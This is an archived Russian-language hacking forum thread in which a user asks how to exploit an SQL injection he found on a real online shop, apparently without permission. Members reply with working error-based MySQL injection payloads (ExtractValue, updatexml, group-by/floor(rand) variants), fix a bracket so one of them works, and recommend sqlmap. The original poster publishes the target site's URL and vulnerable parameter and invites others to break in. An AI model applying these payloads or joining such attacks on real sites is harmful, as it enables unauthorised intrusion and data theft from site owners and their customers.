Нашел инъекцию, а дальше??? [Архив]

Просмотр полной версии : Нашел инъекцию, а дальше???

joomla

26.08.2015, 05:07

Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.

http://storage3.static.itmages.ru/i/15/0826/h_1440551333_8174911_cd034d40ce.png

Вообщем что только не придумывал, и union прописывал и т.д.

Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.

http://storage2.static.itmages.ru/i/15/0826/h_1440551296_9911745_79a5a0d2df.jpg

Какие еще могут быть варианты для взлома?

Br@!ns

26.08.2015, 06:37

Пробуйте error based вектор. например:

'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1

или

'-updatexml(0,repeat(version(),2),2)#

sander

26.08.2015, 11:13

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .

joomla

27.08.2015, 02:17

↑ (https://antichat.live/posts/3884435/)
Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .

да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.

----------------------------------

joomla

27.08.2015, 02:18

↑ (https://antichat.live/posts/3884394/)
Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#

Не помогло....

faza02

27.08.2015, 16:37

"))))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23

в ошибке увидите версию

sander

27.08.2015, 17:43

↑ (https://antichat.live/posts/3884931/)
"))))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23
в ошибке увидите версию

Тоже не пашет .

BabaDook

27.08.2015, 17:45

↑ (https://antichat.live/posts/3884931/)
"))))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23
в ошибке увидите версию

а какого типа эта инъекция, если можно манукльчик ))

OxoTnik

27.08.2015, 17:45

↑ (https://antichat.live/posts/3884955/)
а какого типа эта инъекция, если можно манукльчик ))

error based

joomla

28.08.2015, 02:22

Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/

Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская" (http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=%D0%9C%D1%83%D0%B6%D1%81%D0%BA%D0%B0%D1%8F%22)

hicel

28.08.2015, 14:59

↑ (https://antichat.live/posts/3884952/)
Тоже не пашет .

Пашет всё=)

joomla

28.08.2015, 17:58

↑ (https://antichat.live/posts/3885245/)
Пашет всё=)

что-то не получается

kingbeef

28.08.2015, 18:02

↑ (https://antichat.live/posts/3885329/)
что-то не получается

Убери одну скобку в запросе.

")))||1+group+by+concat(version(),floor(rand(0)*2)) having+min(0)%23

Надо ошибки тоже читать.

joomla

28.08.2015, 23:02

↑ (https://antichat.live/posts/3885332/)
Убери одну скобку в запросе.
")))||1+group+by+concat(version(),floor(rand(0)*2)) having+min(0)%23
Надо ошибки тоже читать.

красавчик ))

strelok20094

29.08.2015, 02:31

joomla

29.08.2015, 04:24

hicel

29.08.2015, 11:49

↑ (https://antichat.live/posts/3885448/)
Можете рассказать как сделали?

sqlmap гугли...

joomla

29.08.2015, 17:48

↑ (https://antichat.live/posts/3885482/)
sqlmap гугли...

От души

hicel

30.08.2015, 00:08

↑ (https://antichat.live/posts/3885575/)
От души

Так то думать надо .... читать ...

(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)

darkart

29.10.2015, 08:04

↑ (https://antichat.live/posts/3885684/)
Так то думать надо .... читать ...
(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)

зачем изобретать велосипед? есть софт он работает

по логу можно понять что происходит

а вот если автоматизация не прокатила то да имеет смысл копать руками!

п.с. имхо